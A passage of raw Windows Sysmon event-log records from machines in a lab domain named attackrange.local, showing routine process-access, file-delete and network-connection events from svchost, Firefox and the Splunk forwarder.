07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-1400-00000000CF01}10289576C:\Windows\System32\svchost.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radardt.dll+11319|C:\Windows\system32\radardt.dll+f2da|C:\Windows\system32\radardt.dll+727d|c:\windows\system32\wdi.dll+1eea|c:\windows\system32\wdi.dll+1d2c|c:\windows\system32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-1400-00000000CF01}10289576C:\Windows\System32\svchost.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla 
Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radardt.dll+d1d3|C:\Windows\system32\radardt.dll+f27e|C:\Windows\system32\radardt.dll+727d|c:\windows\system32\wdi.dll+1eea|c:\windows\system32\wdi.dll+1d2c|c:\windows\system32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15E352059B1DEDC7CFA9EFB28A4027F8,SHA256=87231949063C18020C8DE6A982BD6456619D511A5F8AA848BA596E4DCD962655,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:40.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57149-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:43.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0776EF4179DCC9612F11AC2E03C7FA,SHA256=EC31383B7EC3C307BF54020451CA3232148551CAC3F81D4CF56293B1B3D05A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.483{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BC6707CF5232AA9CC977B3DF3E4A3608,SHA256=8D9C82E7B412083E55F15E61DE483A22F5233243513351E39E60075B1C8577D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00F0766E215A29EC8D1E4E7029A4F1BB,SHA256=CA11BBC5E07BC51FDEF1B0DC4739FE072FBF8F652C167597016D525B7DC12DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3D0DCE74CADA78064CDC1545F63271,SHA256=F4861E7AF20F0BECF8879F469248BA40493610F908D519BB9173E88BE04EE687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BC6707CF5232AA9CC977B3DF3E4A3608,SHA256=8D9C82E7B412083E55F15E61DE483A22F5233243513351E39E60075B1C8577D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1BC07E5FD8A18F8F289EDA395661EA4,SHA256=AA70BC0CB8036F67BD83D1671016762B24DCF1085A7E5030F5EA82BF867967D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D2C80ACF2B21B28F0C614BDFD7BA1D,SHA256=F80B054496C3C9D5EBDF14EF6C99BF1C2DC489782EAB78A6B837E501430DD3C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:44.966{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF725499AC76854CEAEF7F7406FE4110,SHA256=A72674700E0480890E60281DF4449EF14CC995E9EE6913FEA13F67A6D17BA467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.470{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B20C684458B4750032DFA7B2D11C1E2,SHA256=232D72640F72E9745C1022B9DAD20C09BB9870624969812175920EA07962E1CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50895-false10.0.1.12-8000- 23542300x8000000000000000806020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:45.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FE243EA1B1870F444BFD45FCB9405A,SHA256=FEA0682417116741C5DD65D2A0D082FA5CE7FD7389CDCEA04BA49361B39B4323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:45.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619A85D532919130759276F45C8E4C25,SHA256=CDCC222059C22935E00B5FD84FCAABDF429867ABB5AD3118DBF584F3F292943C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:46.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DBD4F946F1CC115E746D58B552918F9,SHA256=758CC8630851D1326A7AD37C9E79582918BC6D2A79C5E3E3D2C40DAD7AF8C913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:46.507{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C6E48CA68A93686157A9C3B5EDA551,SHA256=CA4D3B1889C31CD214BCEAFC9942D1619DB689EC7D394B99C676DC4095151A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:47.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AAE8E051DB5DFA1D1F582CDF102458,SHA256=F4E9C98D2976452D3C7AEAA3BCC9E5A7F6D1EB8E86EAC92A583854E59D404699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:47.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 